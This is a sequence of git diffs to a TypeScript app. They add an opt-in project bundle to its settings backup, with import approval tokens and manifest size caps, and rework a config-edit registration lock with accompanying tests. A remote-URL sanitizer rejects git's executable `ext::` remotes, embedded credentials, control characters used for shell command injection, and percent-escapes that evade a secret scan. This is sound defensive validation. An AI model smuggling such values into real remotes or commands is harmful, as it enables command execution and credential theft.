   .passthrough();
 

--- a/src/common/config/schemas/settingsBackup.ts
+++ b/src/common/config/schemas/settingsBackup.ts
@@ -216,6 +216,9 @@ export function sanitizeBackupGitRemote(rawUrl: string): string | undefined {
   // injection into a later shell paste would start.
   // eslint-disable-next-line no-control-regex
   if (/[\s\u0000-\u001f\u007f]/.test(url)) return undefined;
+  // Percent-escapes would let a credential pattern hide from the publish-time secret scan
+  // (which sees the manifest text, not its decoded form); real remotes do not need them.
+  if (/%[0-9A-Fa-f]{2}/.test(url)) return undefined;
   if (hasUrlCredentials(url)) return undefined;
   if (/^(?:https?|ssh):\/\/[^/]+/i.test(url)) return url;
   // scp-like `user@host:path`. A scheme prefix was handled above, and a single-letter

--- a/src/common/config/schemas/settingsBackup.ts
+++ b/src/common/config/schemas/settingsBackup.ts
@@ -246,7 +246,9 @@ export const BackupProjectBundleManifestSchema = z.object({
   projects: z.array(BackupProjectBundleEntrySchema).max(MAX_BACKUP_PROJECT_ENTRIES),
   files: z.array(
     z.object({
-      path: z.string().min(1),
+      // Capped like the entry fields: an unbounded path would reach lstat (whose error
+      // message echoes it) and the renderer before any shape validation ran.
+      path: z.string().min(1).max(1024),
       sha256: z.string().regex(/^[0-9a-f]{64}$/),
     })
   ),

--- a/src/common/config/schemas/settingsBackup.ts
+++ b/src/common/config/schemas/settingsBackup.ts
@@ -214,6 +214,7 @@ export function sanitizeBackupGitRemote(rawUrl: string): string | undefined {
   if (url === "" || url.length > 2048) return undefined;
   // Control characters and whitespace have no place in a remote URL and are how command
   // injection into a later shell paste would start.
+  // eslint-disable-next-line no-control-regex
   if (/[\s\u0000-\u001f\u007f]/.test(url)) return undefined;
   if (hasUrlCredentials(url)) return undefined;
   if (/^(?:https?|ssh):\/\/[^/]+/i.test(url)) return url;

--- a/src/common/config/schemas/settingsBackup.ts
+++ b/src/common/config/schemas/settingsBackup.ts
@@ -198,6 +198,58 @@ export function hasUrlCredentials(repoUrl: string): boolean {
   }
 }
 
+/** Bounds project-bundle manifest parsing work, mirroring the MCP redaction caps. */
+export const MAX_BACKUP_PROJECT_ENTRIES = 256;
+
+/**
+ * A recorded project remote is display-only data on restore, but it still travels through a
+ * repository other people may read, and a crafted bundle could try to smuggle an executable
+ * remote (`ext::`), a local path, or an embedded credential back into the UI. Only plain
+ * `http(s)`, `ssh`, and scp-like `user@host:path` shapes survive; anything else is dropped
+ * rather than rejected, because a remote is a hint and never worth failing an export or a
+ * restore over.
+ */
+export function sanitizeBackupGitRemote(rawUrl: string): string | undefined {
+  const url = rawUrl.trim();
+  if (url === "" || url.length > 2048) return undefined;
+  // Control characters and whitespace have no place in a remote URL and are how command
+  // injection into a later shell paste would start.
+  if (/[\s\u0000-\u001f\u007f]/.test(url)) return undefined;
+  if (hasUrlCredentials(url)) return undefined;
+  if (/^(?:https?|ssh):\/\/[^/]+/i.test(url)) return url;
+  // scp-like `user@host:path`. A scheme prefix was handled above, and a single-letter
+  // prefix would be a Windows drive path rather than a host.
+  if (/^[A-Za-z0-9._-]+@[A-Za-z0-9._-]+:[^/][^\s]*$/.test(url) && !url.includes("::")) return url;
+  return undefined;
+}
+
+/**
+ * One project entry in the opt-in project bundle. `path` is the absolute path on the
+ * machine that exported the backup — an import hint only, never a write target on this
+ * one. `memoryDir` records the actual memory directory name of the source install;
+ * restore destinations are always recomputed locally from the target path.
+ */
+export const BackupProjectBundleEntrySchema = z.object({
+  path: z.string().min(1),
+  name: z.string().min(1),
+  gitRemote: z.string().optional(),
+  memoryDir: z.string().min(1),
+});
+
+export const BackupProjectBundleManifestSchema = z.object({
+  schemaVersion: z.literal(1),
+  projects: z.array(BackupProjectBundleEntrySchema).max(MAX_BACKUP_PROJECT_ENTRIES),
+  files: z.array(
+    z.object({
+      path: z.string().min(1),
+      sha256: z.string().regex(/^[0-9a-f]{64}$/),
+    })
+  ),
+});
+
+export type BackupProjectBundleEntry = z.infer<typeof BackupProjectBundleEntrySchema>;
+export type BackupProjectBundleManifest = z.infer<typeof BackupProjectBundleManifestSchema>;
+
 /**
  * The persisted schema extends the IPC input schema so config.json cannot hold a value
  * the `getSettings` response rejects, leaving the Backup screen unable to load saved settings.
@@ -222,6 +274,12 @@ export const SettingsBackupInputSchema = z.object({
     .trim()
     .min(1, { message: "Enter a subdirectory inside the repository" })
     .refine(isValidBackupPath, { message: "Enter a subdirectory inside the repository" }),
+  /**
+   * Opt-in: also back up the project list and per-project memories as a `project-bundle/`
+   * sidecar, and allow restores to write project content. Off by default because project
+   * memories are private working notes and the project list reveals local paths.
+   */
+  includeProjects: z.boolean().optional(),
 });
 
 export const SettingsBackupSchema = SettingsBackupInputSchema.extend({

--- a/src/common/config/schemas/settingsBackup.ts
+++ b/src/common/config/schemas/settingsBackup.ts
@@ -237,8 +237,15 @@ export function sanitizeBackupGitRemote(rawUrl: string): string | undefined {
 // otherwise valid manifest could put megabytes into one name or path and push that through
 // hashing, IPC, and renderer text nodes. The bounds are generous for real values — paths
 // beat every platform default and the remote cap matches sanitizeBackupGitRemote's.
+/**
+ * Cap on a recorded project path. Also the cap on an import's target path: the local
+ * recovery copy a later matched restore writes records the local project path in this same
+ * schema, so a target this build could not record would fail every later restore of it.
+ */
+export const MAX_BACKUP_PROJECT_PATH_CHARS = 1024;
+
 export const BackupProjectBundleEntrySchema = z.object({
-  path: z.string().min(1).max(1024),
+  path: z.string().min(1).max(MAX_BACKUP_PROJECT_PATH_CHARS),
   name: z.string().min(1).max(256),
   gitRemote: z.string().max(2048).optional(),
   memoryDir: z.string().min(1),

--- a/src/common/config/schemas/settingsBackup.ts
+++ b/src/common/config/schemas/settingsBackup.ts
@@ -230,10 +230,14 @@ export function sanitizeBackupGitRemote(rawUrl: string): string | undefined {
  * one. `memoryDir` records the actual memory directory name of the source install;
  * restore destinations are always recomputed locally from the target path.
  */
+// Per-field caps because the manifest is repository-controlled: without them a crafted,
+// otherwise valid manifest could put megabytes into one name or path and push that through
+// hashing, IPC, and renderer text nodes. The bounds are generous for real values — paths
+// beat every platform default and the remote cap matches sanitizeBackupGitRemote's.
 export const BackupProjectBundleEntrySchema = z.object({
-  path: z.string().min(1),
-  name: z.string().min(1),
-  gitRemote: z.string().optional(),
+  path: z.string().min(1).max(1024),
+  name: z.string().min(1).max(256),
+  gitRemote: z.string().max(2048).optional(),
   memoryDir: z.string().min(1),
 });
 

--- a/src/common/constants/memory.ts
+++ b/src/common/constants/memory.ts
@@ -6,7 +6,9 @@
  * physical root:
  * - global    -> <xumHome>/memory/global/ (host-local, permanent, shared across projects)
  * - project   -> <xumHome>/memory/project/<project dir>/ (host-local, private
- *                per-project notes; never committed, survives workspaces)
+ *                per-project notes; never committed to the repo, survives
+ *                workspaces; carried by the settings backup only when the
+ *                user opts into the project bundle)
  * - workspace -> <sessionDir>/memory/ (host-local, deleted with the workspace)
  */
 

--- a/src/common/orpc/schemas/backup.ts
+++ b/src/common/orpc/schemas/backup.ts
@@ -16,6 +16,33 @@ export const BackupCommandApprovalSchema = z.object({
   token: z.string(),
 });
 
+/**
+ * A project-bundle entry that is not registered on this machine at exactly its recorded
+ * path. Nothing is written for it unless the user approves the import explicitly. `token`
+ * binds the approval to the exact entry and memory content it was shown for, so a
+ * repository change between preview and restore forces re-approval.
+ */
+export const BackupProjectImportSchema = z.object({
+  sourcePath: z.string(),
+  name: z.string(),
+  /** Display-only hint; the user clones manually. Never rendered as a link or executed. */
+  gitRemote: z.string().nullish(),
+  memoryFileCount: z.number(),
+  token: z.string(),
+});
+
+/** One approved import's outcome; failures are reported per candidate, never thrown. */
+export const BackupProjectImportResultSchema = z.object({
+  sourcePath: z.string(),
+  targetPath: z.string(),
+  name: z.string(),
+  status: z.enum(["imported", "failed"]),
+  message: z.string().nullish(),
+  writtenFiles: z.array(z.string()),
+  /** Existing target files with different content: kept, reported, never overwritten. */
+  skippedFiles: z.array(z.string()),
+});
+
 export const BackupOperationErrorSchema = z.object({
   code: z.enum([
     "AUTH_FAILED",
@@ -24,6 +51,7 @@ export const BackupOperationErrorSchema = z.object({
     "INVALID_BACKUP",
     "SECRET_DETECTED",
     "COMMAND_APPROVAL_REQUIRED",
+    "PROJECT_IMPORT_APPROVAL_REQUIRED",
     "IO_ERROR",
     "GIT_ERROR",
   ]),
@@ -37,6 +65,12 @@ export const BackupOperationErrorSchema = z.object({
    * list instead of a stale or empty one.
    */
   commandApprovals: z.array(BackupCommandApprovalSchema).nullish(),
+  /**
+   * On PROJECT_IMPORT_APPROVAL_REQUIRED: the current import candidates, recomputed from
+   * the checked-out payload, so a restore whose approval tokens went stale can present
+   * the fresh list instead of failing opaquely.
+   */
+  projectImports: z.array(BackupProjectImportSchema).nullish(),
   /**
    * Set when a restore fails after its safety snapshot completed: files may already have
    * been overwritten, and the snapshot is the only recovery path, so a failure report
@@ -82,6 +116,10 @@ export const backup = {
         localOnlyFiles: z.array(z.string()),
         redactions: z.array(z.string()),
         commandApprovals: z.array(BackupCommandApprovalSchema),
+        /** Project-bundle entries a restore would only import with explicit approval. */
+        projectImports: z.array(BackupProjectImportSchema),
+        /** The backup carries a project bundle but `includeProjects` is off, so it is skipped. */
+        projectBundleSkipped: z.boolean(),
       })
     ),
   },
@@ -101,6 +139,12 @@ export const backup = {
   restore: {
     input: SettingsBackupInputSchema.extend({
       approvedCommandTokens: z.array(z.string()).nullish(),
+      /**
+       * Approved project imports: each token from a previewed candidate plus the local
+       * directory to register the project at. Unknown or stale tokens abort the restore
+       * with PROJECT_IMPORT_APPROVAL_REQUIRED before anything is written.
+       */
+      projectImports: z.array(z.object({ token: z.string(), targetPath: z.string() })).nullish(),
     }),
     output: BackupResult(
       z.object({
@@ -108,6 +152,9 @@ export const backup = {
         snapshotPath: z.string(),
         changedFiles: z.array(z.string()),
         localOnlyFiles: z.array(z.string()),
+        projectImportResults: z.array(BackupProjectImportResultSchema),
+        /** The backup carries a project bundle but `includeProjects` is off, so it is skipped. */
+        projectBundleSkipped: z.boolean(),
       })
     ),
   },
@@ -118,3 +165,5 @@ export type BackupOperationError = z.infer<typeof BackupOperationErrorSchema>;
 export type BackupFileChange = z.infer<typeof BackupFileChangeSchema>;
 export type BackupCommandApproval = z.infer<typeof BackupCommandApprovalSchema>;
 export type BackupCredentialKind = z.infer<typeof BackupCredentialKindSchema>;
+export type BackupProjectImport = z.infer<typeof BackupProjectImportSchema>;
+export type BackupProjectImportResult = z.infer<typeof BackupProjectImportResultSchema>;

--- a/src/common/orpc/schemas/backup.ts
+++ b/src/common/orpc/schemas/backup.ts
@@ -41,6 +41,12 @@ export const BackupProjectImportResultSchema = z.object({
   writtenFiles: z.array(z.string()),
   /** Existing target files with different content: kept, reported, never overwritten. */
   skippedFiles: z.array(z.string()),
+  /**
+   * True when this import registered the target as a new project. The safety snapshot does
+   * not cover registrations, so undoing the import means unregistering it — but only then:
+   * an import into an already registered project must not tell the user to remove it.
+   */
+  registered: z.boolean(),
 });
 
 export const BackupOperationErrorSchema = z.object({

--- a/src/common/orpc/schemas/backup.ts
+++ b/src/common/orpc/schemas/backup.ts
@@ -161,6 +161,11 @@ export const backup = {
         projectImportResults: z.array(BackupProjectImportResultSchema),
         /** The backup carries a project bundle but `includeProjects` is off, so it is skipped. */
         projectBundleSkipped: z.boolean(),
+        /**
+         * Candidates left unimported for lack of approval (no preview, or unchecked). Fresh
+         * tokens, so the UI can offer them for approval right away.
+         */
+        unapprovedProjectImports: z.array(BackupProjectImportSchema),
       })
     ),
   },

--- a/src/common/orpc/schemas/backup.ts
+++ b/src/common/orpc/schemas/backup.ts
@@ -120,6 +120,12 @@ export const backup = {
         projectImports: z.array(BackupProjectImportSchema),
         /** The backup carries a project bundle but `includeProjects` is off, so it is skipped. */
         projectBundleSkipped: z.boolean(),
+        /**
+         * Why the push half could not be computed, if it could not. The restore half is
+         * still reported so a local export problem never blocks reviewing or approving
+         * what a restore would bring in.
+         */
+        pushError: z.string().nullable(),
       })
     ),
   },

--- a/src/common/utils/systemProjects.ts
+++ b/src/common/utils/systemProjects.ts
@@ -1,0 +1,17 @@
+import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
+import { SCRATCH_PROJECT_CONFIG_KEY } from "@/common/constants/scratch";
+import type { ProjectConfig } from "@/common/types/project";
+
+/**
+ * Config entries that are not user projects: the synthetic multi-project and scratch keys and
+ * system-kind projects. Settings backup neither exports them nor lets a restore resolve an
+ * import target to one — MemoryService keeps no project memory for them, so memory written
+ * under their identity would be unreachable.
+ */
+export function isSystemProjectEntry(projectPath: string, projectConfig: ProjectConfig): boolean {
+  return (
+    projectPath === MULTI_PROJECT_CONFIG_KEY ||
+    projectPath === SCRATCH_PROJECT_CONFIG_KEY ||
+    projectConfig.projectKind === "system"
+  );
+}

--- a/src/common/utils/tools/toolDefinitions.ts
+++ b/src/common/utils/tools/toolDefinitions.ts
@@ -2327,7 +2327,7 @@ export const TOOL_DEFINITIONS = {
       "MEMORY PROTOCOL: check relevant memories before acting on a task; record durable facts, preferences, and lessons as you learn them; update or delete memories that turn out to be wrong or stale.\n" +
       "Scopes (all paths are virtual):\n" +
       "- /memories/global/... — personal, permanent, shared across all projects\n" +
-      "- /memories/project/... — private notes about this project; host-local, never committed, survives workspaces\n" +
+      "- /memories/project/... — private notes about this project; host-local, never committed to the repo (included in the settings backup only when the user opts in), survives workspaces\n" +
       "- /memories/workspace/... — scratch state for this workspace; deleted with the workspace\n" +
       "Commands:\n" +
       "- view: list a directory (up to 2 levels, dotfiles excluded) or show a file with line numbers (offset/limit supported)\n" +

--- a/src/node/config.test.ts
+++ b/src/node/config.test.ts
@@ -543,6 +543,31 @@ describe("Config", () => {
       ]);
       expect(new Config(tempDir).loadConfigOrDefault().advisorMaxUsesPerTurn).toBe(6);
     });
+
+    it("invokes the edit callback exactly once, with or without waiting for the lock", async () => {
+      // Callbacks are not pure: TaskService.editWorkspaceEntry runs a caller-supplied updater
+      // inside one, and others record results into captured state. A discarded first run
+      // would let those side effects escape twice.
+      let calls = 0;
+      const count = (cfg: Parameters<Parameters<Config["editConfig"]>[0]>[0]) => {
+        calls += 1;
+        return cfg;
+      };
+      await config.editConfig(count);
+      expect(calls).toBe(1);
+
+      const otherProcess = await acquireProcessFileLock({
+        lockPath: projectRegistrationLockFilePath(tempDir),
+        timeoutMs: 5_000,
+        label: "test holder",
+      });
+      const waiting = config.editConfig(count);
+      await new Promise((resolve) => setTimeout(resolve, 100));
+      expect(calls).toBe(1);
+      await otherProcess[Symbol.asyncDispose]();
+      await waiting;
+      expect(calls).toBe(2);
+    });
   });
 
   describe("workspace tags", () => {

--- a/src/node/config.test.ts
+++ b/src/node/config.test.ts
@@ -570,6 +570,35 @@ describe("Config", () => {
     });
   });
 
+  describe("configFileWriteGeneration", () => {
+    it("differs between two saves of the same content", async () => {
+      const configFile = path.join(tempDir, "config.json");
+      const withoutStamp = () => {
+        const { writeId, ...rest } = JSON.parse(fs.readFileSync(configFile, "utf-8")) as {
+          writeId: unknown;
+        };
+        expect(typeof writeId).toBe("string");
+        return rest;
+      };
+      // The first save also persists load-time migrations; the two compared are steady-state.
+      await flushConfigEdits();
+      await config.editConfig((cfg) => cfg);
+      const first = await config.configFileWriteGeneration();
+      const firstContent = withoutStamp();
+      await config.editConfig((cfg) => cfg);
+      // Nothing but the stamp changed, and the stamp is what tells the two writes apart — a
+      // reader comparing generations around a window sees the second save even where mtime
+      // granularity and inode reuse would make the file look untouched.
+      expect(withoutStamp()).toEqual(firstContent);
+      expect(await config.configFileWriteGeneration()).not.toBe(first);
+      expect(
+        await new Config(
+          fs.mkdtempSync(path.join(os.tmpdir(), "mux-test-"))
+        ).configFileWriteGeneration()
+      ).toBe("absent");
+    });
+  });
+
   describe("workspace tags", () => {
     it("persists programmatic tags through save/load and metadata mapping", async () => {
       await config.editConfig((cfg) => {

--- a/src/node/config.test.ts
+++ b/src/node/config.test.ts
@@ -4,6 +4,8 @@ import * as fs from "fs";
 import * as os from "os";
 import { log } from "@/node/services/log";
 import { Config } from "./config";
+import { projectRegistrationLockFilePath } from "./config/projectRegistrationLock";
+import { acquireProcessFileLock } from "./utils/concurrency/fileLock";
 import { DEFAULT_TASK_SETTINGS } from "@/common/types/tasks";
 import { KNOWN_MODELS } from "@/common/constants/knownModels";
 import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
@@ -507,6 +509,39 @@ describe("Config", () => {
         .loadConfigOrDefault()
         .projects.get("/repo")?.workspaces;
       expect(workspaces?.map((w) => w.taskStatus)).toEqual(["running", "running"]);
+    });
+
+    it("keeps call order for edits that waited for the registration lock", async () => {
+      // Another process holds the registration file lock; edits issued meanwhile step out of
+      // the queue to wait for it. Each polls the lock, which is not fair, so left to
+      // themselves a later edit could take it first and an earlier edit then overwrite it:
+      // rapid true→false preference updates would persist true.
+      const otherProcess = await acquireProcessFileLock({
+        lockPath: projectRegistrationLockFilePath(tempDir),
+        timeoutMs: 5_000,
+        label: "test holder",
+      });
+      // Real writes, recorded: each edit spreads a new object, so the recorded arguments
+      // keep the value each write carried.
+      const saveConfig = spyOn(
+        config as unknown as { saveConfig: (cfg: { advisorMaxUsesPerTurn?: number }) => unknown },
+        "saveConfig"
+      );
+      const setUses = (value: number) =>
+        config.editConfig((cfg) => ({ ...cfg, advisorMaxUsesPerTurn: value }));
+      // Three edits while the first is still in its slot, three more once it has stepped out
+      // and is waiting; the order must hold across both.
+      const edits = [setUses(1), setUses(2), setUses(3)];
+      await new Promise((resolve) => setTimeout(resolve, 100));
+      expect(saveConfig).not.toHaveBeenCalled();
+      edits.push(setUses(4), setUses(5), setUses(6));
+      await otherProcess[Symbol.asyncDispose]();
+      await Promise.all(edits);
+
+      expect(saveConfig.mock.calls.map(([cfg]) => cfg.advisorMaxUsesPerTurn)).toEqual([
+        1, 2, 3, 4, 5, 6,
+      ]);
+      expect(new Config(tempDir).loadConfigOrDefault().advisorMaxUsesPerTurn).toBe(6);
     });
   });
 

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -923,17 +923,6 @@ class ProjectRegistrationLockContended extends Error {
   }
 }
 
-function sameProjectKeys(
-  before: ReadonlySet<string>,
-  after: ReadonlyMap<string, unknown>
-): boolean {
-  if (before.size !== after.size) return false;
-  for (const key of after.keys()) {
-    if (!before.has(key)) return false;
-  }
-  return true;
-}
-
 export class Config {
   readonly rootDir: string;
   readonly sessionsDir: string;
@@ -2604,17 +2593,12 @@ export class Config {
   ): Effect.Effect<void, unknown> {
     // eslint-disable-next-line @typescript-eslint/no-this-alias -- Effect.gen generator bodies do not inherit `this`
     const self = this;
-    /** The transform on fresh bytes, and whether it changes the project set. */
-    const transform = (): { newConfig: ProjectsConfig; changesProjects: boolean } => {
-      const config = self.loadConfigOrDefault();
-      // Snapshotted before the transform, which usually mutates `config` in place.
-      const projectKeysBefore = new Set(config.projects.keys());
-      const newConfig = fn(config);
-      return {
-        newConfig,
-        changesProjects: !sameProjectKeys(projectKeysBefore, newConfig.projects),
-      };
-    };
+    /**
+     * The transform on fresh bytes. Invoked exactly once per edit, since `fn` need not be
+     * pure (callers run their own updaters and record results inside it): only after the
+     * edit holds the lock it will write under, so no invocation's result is discarded.
+     */
+    const transform = (): ProjectsConfig => fn(self.loadConfigOrDefault());
     const write = Effect.fn(function* (
       newConfig: ProjectsConfig,
       lock: ProjectRegistrationLockHandle
@@ -2641,27 +2625,35 @@ export class Config {
       Effect.uninterruptible(
         Effect.gen(function* () {
           // Effect.try keeps the pre-Effect contract: a throwing transform or a rejected
-          // corrupt-file gate reaches the caller as the raw original error. The gate runs
-          // here, before any lock work, so an unreadable config is refused for that reason
-          // and not for a lockfile it could not create; `write` re-checks it before saving.
-          const first = yield* Effect.try({
+          // corrupt-file gate reaches the caller as the raw original error.
+          if (registrationLock.kind === "held") {
+            const newConfig = yield* Effect.try({
+              try: () => {
+                const result = transform();
+                self.assertConfigWritable();
+                return result;
+              },
+              catch: (error) => error,
+            });
+            return yield* write(newConfig, registrationLock.lock);
+          }
+          // The gate runs here, before any lock work, so an unreadable config is refused for
+          // that reason and not for a lockfile it could not create; `write` re-checks it
+          // before saving. The load is what records a failed read for the gate; `fn` is not
+          // invoked until the edit holds the lock.
+          yield* Effect.try({
             try: () => {
-              const result = transform();
+              self.loadConfigOrDefault();
               self.assertConfigWritable();
-              return result;
             },
             catch: (error) => error,
           });
-          if (registrationLock.kind === "held") {
-            return yield* write(first.newConfig, registrationLock.lock);
-          }
           // The file lock is tried here, inside the queue slot so the edit keeps its order.
           // Held elsewhere — by another process, or by a window in this one — the edit fails
           // the slot and editConfig waits for the lock outside the queue, behind any edit
           // already waiting; while one is, the lock is not even tried, since taking it would
-          // put this edit ahead of that one. Under the lock the transform runs again on the
-          // bytes as they are: whoever held it may have written config.json since the first
-          // run, and a snapshot from before would clobber that.
+          // put this edit ahead of that one. The transform runs only under the lock, on the
+          // bytes as they are: whoever held it may have written config.json meanwhile.
           yield* Effect.tryPromise({
             try: async () => {
               if (self.lockWaiters !== null) {
@@ -2670,8 +2662,7 @@ export class Config {
               await using lock = await tryProjectRegistrationFileLock(self.rootDir);
               if (lock === null)
                 throw new ProjectRegistrationLockContended(self.joinLockWaiters(fn));
-              const fresh = transform();
-              await Effect.runPromise(write(fresh.newConfig, lock));
+              await Effect.runPromise(write(transform(), lock));
             },
             catch: (error) => error,
           });

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -87,8 +87,11 @@ import { isProviderAutoRouteEligible } from "@/node/utils/providerRequirements";
 import { getContainerName as getDockerContainerName } from "@/node/runtime/DockerRuntime";
 import { deriveProjectHierarchy } from "@/common/utils/subProjects";
 import {
-  isProjectRegistrationLockHeld,
+  isProjectRegistrationMutexHeld,
+  tryProjectRegistrationFileLock,
+  withProjectRegistrationFileLock,
   withProjectRegistrationLock,
+  withProjectRegistrationMutex,
 } from "@/node/config/projectRegistrationLock";
 import { coerceThinkingLevel, type ThinkingLevel } from "@/common/types/thinking";
 
@@ -902,11 +905,26 @@ function normalizeAdvisorPositiveInteger(value: number | null, label: string): n
   return value;
 }
 
+/**
+ * What an edit already holds of the project registration lock when it enters the queue:
+ * `held` both legs (issued inside a restore or import window), `in-process` the mutex only
+ * (editConfig's free path; the file lock is taken in the queue slot if needed), `none`.
+ */
+type RegistrationLockState = "held" | "in-process" | "none";
+
 /** Thrown inside the edit queue when a transform changes the project set without the lock. */
 class ProjectRegistrationLockRequired extends Error {
   constructor() {
     super("project registration lock required");
     this.name = "ProjectRegistrationLockRequired";
+  }
+}
+
+/** Thrown inside the edit queue when another process holds the registration file lock. */
+class ProjectRegistrationLockContended extends Error {
+  constructor() {
+    super("project registration lock held by another process");
+    this.name = "ProjectRegistrationLockContended";
   }
 }
 
@@ -1721,7 +1739,7 @@ export class Config {
           // re-applied on every load, so the identity transform re-reads disk, re-runs them,
           // and persists the migrated form under the queue. One-shot guard: while a persist
           // is in flight, the loads it performs internally must not re-schedule.
-          this.migrationPersist = this.enqueueConfigEdit((migratedConfig) => migratedConfig, false)
+          this.migrationPersist = this.enqueueGatedConfigEdit((migratedConfig) => migratedConfig)
             .catch((error: unknown) => {
               // Keep startup resilient even if persisting migration fails.
               log.warn("Failed to persist migrated config", { error });
@@ -2191,23 +2209,46 @@ export class Config {
     fn: (config: ProjectsConfig) => ProjectsConfig,
     options: { withinRegistrationLock?: boolean } = {}
   ): Promise<void> {
-    if (options.withinRegistrationLock === true) return this.enqueueConfigEdit(fn, true);
-    // Free: taken now, around this one edit, whether or not it turns out to change the
-    // project set. The lock's free path runs synchronously, so the edit keeps its place in
-    // the queue relative to edits issued around it.
-    if (!isProjectRegistrationLockHeld(this.rootDir)) {
-      return withProjectRegistrationLock(this.rootDir, () => this.enqueueConfigEdit(fn, true));
+    if (options.withinRegistrationLock === true) return this.enqueueConfigEdit(fn, "held");
+    return this.enqueueGatedConfigEdit(fn);
+  }
+
+  /**
+   * The registration gate for an edit issued outside any registration window; shared by
+   * editConfig and the load-time migration persist (which must not call the public, commonly
+   * spied editConfig).
+   */
+  private async enqueueGatedConfigEdit(
+    fn: (config: ProjectsConfig) => ProjectsConfig
+  ): Promise<void> {
+    // Mutex free: taken now, around this one edit, whether or not it turns out to change the
+    // project set. Its free path runs synchronously, so the edit keeps its place in the
+    // queue relative to edits issued around it. The cross-process leg is tried inside the
+    // queue slot once the transform has shown it changes the project set; only when another
+    // process holds it does the edit step out of the queue to wait, so no other edit is
+    // held up behind a wait on another process.
+    if (!isProjectRegistrationMutexHeld(this.rootDir)) {
+      return withProjectRegistrationMutex(this.rootDir, async () => {
+        try {
+          return await this.enqueueConfigEdit(fn, "in-process");
+        } catch (error) {
+          if (!(error instanceof ProjectRegistrationLockContended)) throw error;
+          return withProjectRegistrationFileLock(this.rootDir, () =>
+            this.enqueueConfigEdit(fn, "held")
+          );
+        }
+      });
     }
-    // Held (a restore or an import window is running): edits that leave the project set
-    // alone go ahead; one that would change it is refused by the queue before writing and
-    // re-run under the lock once it is released. Its first run was discarded — nothing it
-    // mutated survives, since loadConfigOrDefault parses fresh bytes on every call — and it
-    // waits outside the queue, so no other edit is held up behind it.
+    // Mutex held (a restore or an import window is running in this process): edits that
+    // leave the project set alone go ahead; one that would change it is refused by the queue
+    // before writing and re-run under the full lock once the window ends. Its first run was
+    // discarded — nothing it mutated survives, since loadConfigOrDefault parses fresh bytes
+    // on every call — and it waits outside the queue, so no other edit is held up behind it.
     try {
-      return await this.enqueueConfigEdit(fn, false);
+      return await this.enqueueConfigEdit(fn, "none");
     } catch (error) {
       if (!(error instanceof ProjectRegistrationLockRequired)) throw error;
-      return withProjectRegistrationLock(this.rootDir, () => this.enqueueConfigEdit(fn, true));
+      return withProjectRegistrationLock(this.rootDir, () => this.enqueueConfigEdit(fn, "held"));
     }
   }
 
@@ -2515,7 +2556,7 @@ export class Config {
    */
   private enqueueConfigEdit(
     fn: (config: ProjectsConfig) => ProjectsConfig,
-    withinRegistrationLock: boolean
+    registrationLock: RegistrationLockState
   ): Promise<void> {
     // Defer the fiber start to a microtask: Effect.runPromise executes fibers
     // synchronously on the caller's stack until the first async boundary, but the old
@@ -2526,7 +2567,7 @@ export class Config {
     // Effect failures reject this promise with the raw error (v4 runPromise does not
     // wrap causes), so callers observe the same rejections as before.
     return Promise.resolve().then(() =>
-      Effect.runPromise(this.enqueueConfigEditEffect(fn, withinRegistrationLock))
+      Effect.runPromise(this.enqueueConfigEditEffect(fn, registrationLock))
     );
   }
 
@@ -2540,82 +2581,118 @@ export class Config {
    */
   private enqueueConfigEditEffect(
     fn: (config: ProjectsConfig) => ProjectsConfig,
-    withinRegistrationLock: boolean
+    registrationLock: RegistrationLockState
   ): Effect.Effect<void, unknown> {
     // eslint-disable-next-line @typescript-eslint/no-this-alias -- Effect.gen generator bodies do not inherit `this`
     const self = this;
+    /** The transform on fresh bytes, and whether it changes the project set. */
+    const transform = (): { newConfig: ProjectsConfig; changesProjects: boolean } => {
+      const config = self.loadConfigOrDefault();
+      // Snapshotted before the transform, which usually mutates `config` in place.
+      const projectKeysBefore = new Set(config.projects.keys());
+      const newConfig = fn(config);
+      return {
+        newConfig,
+        changesProjects: !sameProjectKeys(projectKeysBefore, newConfig.projects),
+      };
+    };
+    const write = Effect.fn(function* (newConfig: ProjectsConfig) {
+      // Effect.try keeps the pre-Effect contract: a rejected corrupt-file gate reaches the
+      // caller as the raw original error.
+      yield* Effect.try({
+        try: () => self.assertConfigWritable(),
+        catch: (error) => error,
+      });
+      // Route through the saveConfig Promise facade (not saveConfigEffect) so test
+      // spies on saveConfig keep intercepting the serialized write.
+      yield* Effect.promise(async () => self.saveConfig(newConfig));
+      // Backend-initiated config edits (for example gateway auth changes) use this signal
+      // so frontend subscribers can refresh derived state without polling.
+      self.notifyConfigChanged();
+    });
     return this.editSemaphore.withPermits(1)(
       Effect.uninterruptible(
         Effect.gen(function* () {
           // Effect.try keeps the pre-Effect contract: a throwing transform or a rejected
-          // corrupt-file gate reaches the caller as the raw original error.
-          const newConfig = yield* Effect.try({
+          // corrupt-file gate reaches the caller as the raw original error. The gate runs
+          // here, before any lock work, so an unreadable config is refused for that reason
+          // and not for a lockfile it could not create; `write` re-checks it before saving.
+          const first = yield* Effect.try({
             try: () => {
-              const config = self.loadConfigOrDefault();
-              // Snapshotted before the transform, which usually mutates `config` in place.
-              const projectKeysBefore = new Set(config.projects.keys());
-              const newConfig = fn(config);
-              // Before the write, so the permit is released and editConfig retries this edit
-              // under the registration lock; see editConfig.
-              if (
-                !withinRegistrationLock &&
-                !sameProjectKeys(projectKeysBefore, newConfig.projects)
-              ) {
-                throw new ProjectRegistrationLockRequired();
-              }
-              // If that load failed, writing would replace the corrupt file with defaults. Only
-              // proceed when the bytes on disk right now are the ones with a confirmed sidecar:
-              // no confirmed backup, a concurrent replacement since the load, or an unreadable
-              // file all reject the edit so callers do not treat the mutation as durable (unlike
-              // saveConfig's log-and-swallow of unexpected I/O errors, this skip is deliberate).
-              // A missing file is safe to overwrite. This cannot fully close the cross-process
-              // race (that needs file locking, which editConfig has never had); it binds the
-              // approval to the current bytes and shrinks the window to the atomic write itself.
-              const failureState = configLoadFailureStates.get(self.configFile);
-              if (failureState) {
-                const rejectEdit = (reason: string): never => {
-                  const message = `Skipping config write to ${self.configFile}: ${reason}`;
-                  log.error(message);
-                  throw new Error(message);
-                };
-                if (failureState.backupSignature === null) {
-                  rejectEdit(
-                    "the existing corrupt config has no confirmed backup yet. Fix the reported backup failure or move the corrupt file aside, then retry."
-                  );
-                }
-                let currentSignature: string | null = null;
-                try {
-                  const currentBytes = fs.readFileSync(self.configFile);
-                  currentSignature = crypto.createHash("sha256").update(currentBytes).digest("hex");
